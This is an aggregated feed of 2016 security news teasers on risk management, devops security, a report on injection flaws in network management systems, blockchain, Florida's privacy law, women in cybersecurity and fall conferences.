2016-09-08 10:27:00 | IDG Contributor Network: Woe is IT, the pain of risk management (lien direct) | As I've spoken with leaders in the security industry over the course of developing this blog, I've learned a lot about the modern CISO. More often, enterprises are looking to hire leaders who not only have a background in IT but also have the required business acumen to understand risk.Risk assessment and risk management are key elements in a successful security strategy because the threat landscape continues to expand with the explosion of IoT. Devices are everywhere, and everyone is connecting to the network causing headaches for security management professionals.LogMeIn recently polled 500 IT professionals on the array of challenges ongoing in their security threat landscape. Not surprisingly, cloud security, devices, and user behavior are some of the most often reported pain points for IT professionals.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-08 03:00:00 | Build security into software development (lien direct) | Devops is transforming how developers and operations teams work together to deliver better software faster. At its core, devops is about automation. When several tasks in development, testing, and deployment are automated, developers can make changes to code and deploy to production frequently. Amazon, a leading devops proponent, at one point claimed to have more than 1,000 deployments a day.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-07 09:01:00 | Half of network management systems vulnerable to injection attacks (lien direct) | Cross-site scripting and SQL injection attacks are well-known threats for public-facing Web applications, but internal systems can be attacked as well. For example, about half of network management systems studied had these vulnerabilities, according to a report released today.It all comes down to input validation, or lack of it, said Deral Heiland, research lead at Boston-based Rapid7, Inc. and one of the authors of the report.Network management systems are in regular communication with the devices on a company's network. But, because the communications are machine-to-machine people sometimes forget that the inputs still need to be checked to make sure there's nothing weird or malicious in there.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-06 05:12:00 | How blockchain will disrupt your business (lien direct) | Like mobile and cloud, blockchain - first implemented in the original source code of bitcoin in 2009 - stands poised to profoundly disrupt business. If it lives up to its promise, it won't just be financial institutions that are disrupted."If you can transfer money or something of value through the internet just like another form of data, what else can you do with it? It provides a way to establish trust in the digital world," says Angus Champion de Crespigny, Financial Services Blockchain and Distributed Infrastructure Strategy Leader, Ernst & Young. "How do you ensure something is the original copy of something on the internet? Prior to blockchain technology, you couldn't."To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-02 07:50:00 | IDG Contributor Network: Florida privacy law adds breach notification and strengthens compliance (lien direct) | We all remember from our early education learning about the three major branches of government in the US: The executive, the legislative and the judicial branches. But how does our legal system work to create privacy law for all our different business sectors?Hint.. it's not how they do it in Europe. We begin by looking at Constitutional law. The U.S and state Constitutions are the primary source of law in America. However a state Constitution may afford more privacy protection than the broader U.S. Constitution. Enter the FIPA act of 2014 from the state of Florida. The Florida Information Protection Act. Each state has its own flavor of data privacy law if it has one at all. FIPA says, "An act relating to security of confidential personal information; providing a short title; repealing s. 4 817.5681, F.S., relating to a breach of security concerning confidential personal information in third-party possession; creating s. 501.171, F.S.; providing definitions; requiring specified entities to take reasonable measures to protect and secure data containing personal information in electronic form; requiring specified entities to notify the Department of Legal Affairs of data security breaches; requiring notice to individuals of data security breaches under certain circumstances..."To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-02 06:18:00 | IDG Contributor Network: 4 important tips for mentoring, coaching and growing women\'s roles in cybersecurity (lien direct) | Women are underrepresented in every industry, at every level of companies. Even more discouraging, a report from the Wall Street Journal suggests that there are significantly less women in the higher ranks of companies, indicating that growth of a female employee plateaus before their careers have even taken off. Not surprisingly, a mere 11 percent of the world's information security workforce are women and less than 2 percent of those women hold C-Suite level positions. This begs the question: how can the women that have become industry leaders help those in entry-level positions grow and develop their careers? Put simply, by acting as mentor to foster career advancement and encourage continued growth.To read this article in full or to leave a comment, please click here | Guideline | ||
|
2016-09-02 03:06:00 | Fall security conferences you don\'t want to miss (lien direct) | Check out more than foliage this fall Image by ThinkstockConferences can be great opportunities for networking and information sharing. While it's a challenge to break away from the responsibilities at the office, taking a day or two to connect with peers across the industry can be invigorating and uplifting, allowing you to return with a fresh and optimistic perspective on the doldrums of threat intelligene. At the MASSTLC Conference in Cambrige, the message of keynote speaker Dave Mahon was to not see each event as a failure. Rather, see each event as an opportunity to learn. That's exactly how I feel about conferences. Attending a conference is the furthest thing from a drag. Each is an opportunity to learn. Here are nine conferences I wish I could attend this fall.To read this article in full or to leave a comment, please click here |
Guideline |
To see everything:
Our RSS (filtrered)
